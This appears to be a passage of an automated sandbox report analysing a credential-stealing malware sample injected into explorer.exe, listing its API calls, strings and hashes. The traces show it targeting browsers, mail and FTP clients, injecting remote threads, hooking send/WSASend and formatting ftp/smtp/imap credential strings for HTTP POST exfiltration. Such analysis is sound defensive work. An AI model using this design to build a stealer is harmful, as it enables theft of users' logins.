                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00141010), ref: 0014107A
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001410DF
                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 001410FE
                                                                                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0014111A
                                                                                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0014112E
                                                                                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00141142
                                                                                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00141156
                                                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00141166
                                                                                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0014117A
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0014118E
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 001411A2
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 001411B6
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 001411CA
                                                                                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 001411DE
                                                                                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 001411F2
                                                                                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00141206
                                                                                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00141216
                                                                                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00141226
                                                                                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00141236
                                                                                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00141246
                                                                                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00141256
                                                                                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00141266
                                                                                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00141276
                                                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001412B4
                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0014130B
                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0014131C
                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00141327
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                        • API String ID: 2555639992-1680033604
                                                                                                                                        • Opcode ID: 9ebffd15af1fb84f2b066f1aea75f627a1c18bd0377867ed2e46894a787be723
                                                                                                                                        • Instruction ID: dc542a9a0b42b0944d1a2474cfaa35a1e40aba12b5a802184d131ad2958b39a5
                                                                                                                                        • Opcode Fuzzy Hash: 9ebffd15af1fb84f2b066f1aea75f627a1c18bd0377867ed2e46894a787be723
                                                                                                                                        • Instruction Fuzzy Hash: F571B170600345BBCB10EFB09C45E6E7BACBF46B80B040629FD50C34B0EB74EA858A74

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00142861: GetProcessHeap.KERNEL32(00000008,0000A000,001410CC), ref: 00142864
                                                                                                                                          • Part of subcall function 00142861: RtlAllocateHeap.NTDLL(00000000), ref: 0014286B
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001410DF
                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 001410FE
                                                                                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0014111A
                                                                                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0014112E
                                                                                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00141142
                                                                                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00141156
                                                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00141166
                                                                                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0014117A
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0014118E
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 001411A2
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 001411B6
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 001411CA
                                                                                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 001411DE
                                                                                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 001411F2
                                                                                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00141206
                                                                                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00141216
                                                                                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00141226
                                                                                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00141236
• lstrcmpiA.KERNEL32(?,263em.exe), ref: 00141246
• lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00141256
• lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00141266
• lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00141276
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001412B4
• Process32Next.KERNEL32(00000000,00000128), ref: 0014130B
• CloseHandle.KERNELBASE(00000000), ref: 0014131C
• Sleep.KERNELBASE(000003E8), ref: 00141327
Strings
Memory Dump Source
• Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_141000_explorer.jbxd
Yara matches
Similarity
• API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
• String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
• API String ID: 3950187957-1680033604
• Opcode ID: c816813c7adb3d35ce144508629c96746254682e23a2ec5d0317ce6e8e176bc6
• Instruction ID: 92e79ddbca890a2d2786162cc7844398bee06be632409996d1ea31b17ee11237
• Opcode Fuzzy Hash: c816813c7adb3d35ce144508629c96746254682e23a2ec5d0317ce6e8e176bc6
• Instruction Fuzzy Hash: 8C515071604309B7DB10DFB18D85E6E7AEC7F45B80B580A29FE50C30B0EB65EA858A75

Control-flow Graph
Memory Dump Source
• Source File: 00000010.00000002.4123294336.0000000000146000.00000040.80000000.00040000.00000000.sdmp, Offset: 00146000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_146000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 137774317c78c2343cdd1fbb4f4123f72b7bb64e5b5728ad2df89d4dde990e6c
• Instruction ID: 473bfa96a7add21fbd4edf95bbf6db1a07cc53cb79d84f7aac3d4cde3a6bea16
• Opcode Fuzzy Hash: 137774317c78c2343cdd1fbb4f4123f72b7bb64e5b5728ad2df89d4dde990e6c
• Instruction Fuzzy Hash: D5513B7194C3924FD7228A78CC986B07BA0DB52321B6D0779D5E5CB3E6E7945C06C7A0

Control-flow Graph
APIs
• GetProcessHeap.KERNEL32(00000008,0000A000,001410CC), ref: 00142864
• RtlAllocateHeap.NTDLL(00000000), ref: 0014286B
Memory Dump Source
• Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_141000_explorer.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: 83665a0c9bdd05d867ba3f2e8a9fa44248d15ce0034d7404760f248a4ede80eb
• Instruction ID: da79892938d1183c4cd3308817a686e1e8b5606c7a56a63013c37fed521d63fe
• Opcode Fuzzy Hash: 83665a0c9bdd05d867ba3f2e8a9fa44248d15ce0034d7404760f248a4ede80eb
• Instruction Fuzzy Hash: C7A012744001007FDD542BE0AC0DF053A18A742301F0003007119C6470C96001CC8721

Control-flow Graph

APIs
  • Part of subcall function 00142608: VirtualQuery.KERNEL32(00144434,?,0000001C), ref: 00142615
• OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 0014184E
• NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00141889
• NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00141919
• RtlMoveMemory.NTDLL(00000000,00143428,00000016), ref: 00141940
• RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00141968
• NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00141978
• CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00141992
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0014199A
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001419A8
• Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001419AF
• GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 001419C5
• GetProcAddress.KERNEL32(00000000), ref: 001419CC
• ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001419E2
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00141A0C
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00141A1F
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00141A26
• Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00141A2D
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00141A41
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00141A58
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00141A65
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00141A6B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00141A71
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00141A74
Strings
Memory Dump Source
• Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_141000_explorer.jbxd
Yara matches
Similarity
• API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
• String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
• API String ID: 1066286714-4141090125
• Opcode ID: 7ca1087d7f885aa60bce7ecbd8176a92638bc5c4ee142ad821ccf18374b4b0d9
• Instruction ID: d213af5b04e23453ef856ba7aa912d67d7e7efffac0b042e39c84af5b6bff1e9
• Opcode Fuzzy Hash: 7ca1087d7f885aa60bce7ecbd8176a92638bc5c4ee142ad821ccf18374b4b0d9
• Instruction Fuzzy Hash: A6619B75205344BFD310DF609C84E6BBBECEF8A754F100628F95993261DB70DE848BA2

Control-flow Graph

APIs
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0014265A
• CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00142672
• lstrlen.KERNEL32(?,00000000), ref: 0014267A
• CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00142685
• CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0014269F
• wsprintfA.USER32 ref: 001426B6
• CryptDestroyHash.ADVAPI32(?), ref: 001426CF
• CryptReleaseContext.ADVAPI32(?,00000000), ref: 001426D9
Strings
Memory Dump Source
• Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_141000_explorer.jbxd
Yara matches
Similarity
• API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
• String ID: %02X
• API String ID: 3341110664-436463671
• Opcode ID: 2ba4dcbbf5db0ee3cd15a42d8a12275f4f7f2d88b60a4ea101a2d6d296bd7cfa
• Instruction ID: d181832de22b54d8d24d3374460cb541158c151d3415ba5ea6b50291050ee5a4
• Opcode Fuzzy Hash: 2ba4dcbbf5db0ee3cd15a42d8a12275f4f7f2d88b60a4ea101a2d6d296bd7cfa
• Instruction Fuzzy Hash: 25113AB5900108BFDB119B95EC88EAEBFBCEB49741F104165FA15E3160D7718F819B60

Control-flow Graph
APIs
• RtlMoveMemory.NTDLL(?,?,?), ref: 00141B4E
• LoadLibraryA.KERNEL32(?,00144434,00000000,00000000,74DF2EE0,00000000,00141910,?,?,?,00000001,?,00000000), ref: 00141B76
• GetProcAddress.KERNEL32(00000000,-00000002), ref: 00141BA3
• LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00141BF4
Memory Dump Source
• Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_141000_explorer.jbxd
Yara matches
Similarity
• API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
• String ID:
• API String ID: 3827878703-0
• Opcode ID: 72474349364c06638ae8f695e113f6ddad86092f3a651f00259beae5cd2e4790
• Instruction ID: f793cc3edc0696430600652cbcd282d48b27a5ba3f044a22af7ba9d7d70ff106
• Opcode Fuzzy Hash: 72474349364c06638ae8f695e113f6ddad86092f3a651f00259beae5cd2e4790
• Instruction Fuzzy Hash: 5131AF75700216BBCB28CF29CC84B76B7E8FF16315B15456CE896CB620E731E885CBA0

Control-flow Graph

APIs
  • Part of subcall function 00142861: GetProcessHeap.KERNEL32(00000008,0000A000,001410CC), ref: 00142864
  • Part of subcall function 00142861: RtlAllocateHeap.NTDLL(00000000), ref: 0014286B
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0014109E,?,00141010), ref: 0014134A
• GetCurrentProcessId.KERNEL32(00000003,?,0014109E,?,00141010), ref: 0014135B
• wsprintfA.USER32 ref: 00141372
  • Part of subcall function 0014263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0014265A
  • Part of subcall function 0014263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00142672
  • Part of subcall function 0014263E: lstrlen.KERNEL32(?,00000000), ref: 0014267A
  • Part of subcall function 0014263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00142685
  • Part of subcall function 0014263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0014269F
  • Part of subcall function 0014263E: wsprintfA.USER32 ref: 001426B6
  • Part of subcall function 0014263E: CryptDestroyHash.ADVAPI32(?), ref: 001426CF
  • Part of subcall function 0014263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 001426D9
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00141389
• GetLastError.KERNEL32 ref: 0014138F
• Sleep.KERNEL32(000001F4), ref: 001413A1
  • Part of subcall function 001424D5: GetCurrentProcessId.KERNEL32 ref: 001424E7
  • Part of subcall function 001424D5: GetCurrentThreadId.KERNEL32 ref: 001424EF
  • Part of subcall function 001424D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001424FF
  • Part of subcall function 001424D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0014250D
  • Part of subcall function 001424D5: CloseHandle.KERNEL32(00000000), ref: 00142566
• GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 001413B8
• GetProcAddress.KERNEL32(00000000), ref: 001413BF
• GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 001413E4
• GetProcAddress.KERNEL32(00000000), ref: 001413EB
  • Part of subcall function 00141DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00141E1D
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0014141D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                                        • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                                        • API String ID: 706757162-1430290102
                                                                                                                                        • Opcode ID: 0a98ea725bea3003754e3ea209afc7936c85b17fa5c89cbcecb2d6eea557c1aa
                                                                                                                                        • Instruction ID: 6a734d277bc1ae49f39d41a44111d6d36205040c18d28d51ba9185124c59cec4
                                                                                                                                        • Opcode Fuzzy Hash: 0a98ea725bea3003754e3ea209afc7936c85b17fa5c89cbcecb2d6eea557c1aa
                                                                                                                                        • Instruction Fuzzy Hash: 8D31B934340214BBCB106FA0DD0AF5E3B65EF16B41F144124F91A976B1CFB59AD18B90

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 235 141647-14165a 236 141660-141662 235->236 237 141748-14174f 235->237 236->237 238 141668-14166b 236->238 238->237 239 141671-14167d lstrlen 238->239 240 141747 239->240 241 141683-14168a lstrlen 239->241 240->237 241->240 242 141690-1416a8 getpeername 241->242 242->240 243 1416ae-1416ca inet_ntoa htons 242->243 243->240 244 1416cc-1416d4 243->244 245 1416d6-1416d9 244->245 246 141708 244->246 248 1416f3-1416f8 245->248 249 1416db-1416de 245->249 247 14170d-14173c call 142861 wsprintfA call 1424ae 246->247 247->240 259 14173e-141745 call 142843 247->259 248->247 251 1416e0-1416e3 249->251 252 141701-141706 249->252 254 1416e5-1416ea 251->254 255 1416fa-1416ff 251->255 252->247 254->248 257 1416ec-1416f1 254->257 255->247 257->240 257->248 259->240
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                                                        • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                                                        • API String ID: 3379139566-1703351401
                                                                                                                                        • Opcode ID: e01b895f3cb4c8f518917d6ec7e52af745ce42f75a5473e6ca936f11c3cb22e2
                                                                                                                                        • Instruction ID: db5f62e2d4cdbb4247cd267900a8d64229033cc69c20dde4a6c11c00b31fb8b2
                                                                                                                                        • Opcode Fuzzy Hash: e01b895f3cb4c8f518917d6ec7e52af745ce42f75a5473e6ca936f11c3cb22e2
                                                                                                                                        • Instruction Fuzzy Hash: 0121F47AE00209BBDF105FBD8D889BE7EA9AB45302B084075E814E3231DB74CE809B60

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 267 141752-141774 GetModuleHandleA GetProcAddress 268 141776-1417c0 RtlZeroMemory * 4 267->268 269 1417c1-1417c6 267->269 268->269
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00141539,?,?,?,0014144B,?), ref: 00141763
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0014176A
                                                                                                                                        • RtlZeroMemory.NTDLL(00144228,00000104), ref: 00141788
                                                                                                                                        • RtlZeroMemory.NTDLL(00144118,00000104), ref: 00141790
                                                                                                                                        • RtlZeroMemory.NTDLL(00144330,00000104), ref: 00141798
                                                                                                                                        • RtlZeroMemory.NTDLL(00144000,00000104), ref: 001417A1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                                                        • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                                                        • API String ID: 1490332519-278825019
                                                                                                                                        • Opcode ID: 3ea750e8d140b45d30113fdee2ba468753e2acb2ee35e23134707040854f0f01
                                                                                                                                        • Instruction ID: 2f93006b057fbea492d2b312cc178e056bdd2f47052c10eb143eaf19be54a191
                                                                                                                                        • Opcode Fuzzy Hash: 3ea750e8d140b45d30113fdee2ba468753e2acb2ee35e23134707040854f0f01
                                                                                                                                        • Instruction Fuzzy Hash: 99F0126678072C37C22027AA7C0AE5BBE5CDB56FE63120261B614A32B1DBD5794046B4

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 001424E7
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 001424EF
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001424FF
                                                                                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 0014250D
                                                                                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0014252C
                                                                                                                                        • SuspendThread.KERNEL32(00000000), ref: 0014253C
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0014254B
                                                                                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0014255B
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00142566
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1467098526-0
                                                                                                                                        • Opcode ID: 9378d1729d7c7136b6ad6eab4a5cb7b95885e8195f54117cd89e861e50578307
                                                                                                                                        • Instruction ID: 3befea721f2bfd38e329ec5c5b91c005015d886216421ec061db0665d042650c
                                                                                                                                        • Opcode Fuzzy Hash: 9378d1729d7c7136b6ad6eab4a5cb7b95885e8195f54117cd89e861e50578307
                                                                                                                                        • Instruction Fuzzy Hash: 1A118E75404200EFD7119F60AC0CBAEBBA8FF86701F100629F655D7170D7308AC98BA2

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 281 141f4a-141fa5 call 1422b8 call 142861 call 1427e2 call 142374 290 141fa7-141fbe 281->290 291 141fc0-141fcc 281->291 294 141fd0-141fd2 290->294 291->294 295 1422a6-1422b5 call 142843 294->295 296 141fd8-14200f RtlZeroMemory 294->296 300 142015-142030 296->300 301 14229e-1422a5 296->301 302 142062-142074 300->302 303 142032-142043 call 1422e5 300->303 301->295 310 142078-14207a 302->310 308 142045-142054 303->308 309 142056 303->309 311 142058-142060 308->311 309->311 312 142080-1420dc call 142731 310->312 313 14228b-142291 310->313 311->310 321 142284 312->321 322 1420e2-1420e7 312->322 315 142293-142295 call 142843 313->315 316 14229a 313->316 315->316 316->301 321->313 323 142101-14212f call 142861 wsprintfW 322->323 324 1420e9-1420fa 322->324 327 142131-142133 323->327 328 142148-14215f 323->328 324->323 329 142134-142137 327->329 334 142161-142197 call 142861 wsprintfW 328->334 335 14219e-1421b8 328->335 330 142142-142144 329->330 331 142139-14213e 329->331 330->328 331->329 333 142140 331->333 333->328 334->335 339 142261-142277 call 142843 335->339 340 1421be-1421d1 335->340 348 142280 339->348 349 142279-14227b call 142843 339->349 340->339 343 1421d7-1421ed call 142861 340->343 351 1421ef-1421fa 343->351 348->321 349->348 352 1421fc-142209 call 142826 351->352 353 14220e-142225 351->353 352->353 357 142227 353->357 358 142229-142236 353->358 357->358 358->351 359 142238-14223c 358->359 360 142256-14225d call 142843 359->360 361 14223e 359->361 360->339 362 14223e call 142815 361->362 364 142243-142250 RtlMoveMemory 362->364 364->360
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00142861: GetProcessHeap.KERNEL32(00000008,0000A000,001410CC), ref: 00142864
                                                                                                                                          • Part of subcall function 00142861: RtlAllocateHeap.NTDLL(00000000), ref: 0014286B
                                                                                                                                          • Part of subcall function 001427E2: lstrlen.KERNEL32(001440DA,?,00000000,00000000,00141F86,74DE8A60,001440DA,00000000), ref: 001427EA
                                                                                                                                          • Part of subcall function 001427E2: MultiByteToWideChar.KERNEL32(00000000,00000000,001440DA,00000001,00000000,00000000), ref: 001427FC
                                                                                                                                          • Part of subcall function 00142374: RtlZeroMemory.NTDLL(?,00000018), ref: 00142386
                                                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00141FE2
                                                                                                                                        • wsprintfW.USER32 ref: 0014211B
                                                                                                                                        • wsprintfW.USER32 ref: 00142186
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00142250
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                        • API String ID: 4204651544-1701262698
                                                                                                                                        • Opcode ID: f18c2778dadabfae572720b8b00f3f5ecd1afbb659c1831f9253271992de4d4c
                                                                                                                                        • Instruction ID: 345907f8c53750eab34a0dbe5d670a1232b0004e96984397bff63189daed8a43
                                                                                                                                        • Opcode Fuzzy Hash: f18c2778dadabfae572720b8b00f3f5ecd1afbb659c1831f9253271992de4d4c
                                                                                                                                        • Instruction Fuzzy Hash: 35A16875608301AFD720DF68D885A2FBBE8AB99740F50092DF995D3271DB70DA848B62

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 366 1425ad-1425c9 OpenProcess 367 142600-142607 366->367 368 1425cb-1425da IsWow64Process 366->368 369 1425f7 368->369 370 1425dc-1425ec IsWow64Process 368->370 372 1425f9-1425fa CloseHandle 369->372 371 1425ee-1425f5 370->371 370->372 371->372 372->367
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,00141287), ref: 001425BF
                                                                                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 001425D1
                                                                                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 001425E4
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 001425FA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                        • String ID: microsoftedgecp.exe
                                                                                                                                        • API String ID: 331459951-1475183003
                                                                                                                                        • Opcode ID: 96575270710c45fdef7c0448f299781a83eda711e6678c48e365be49451f61e8
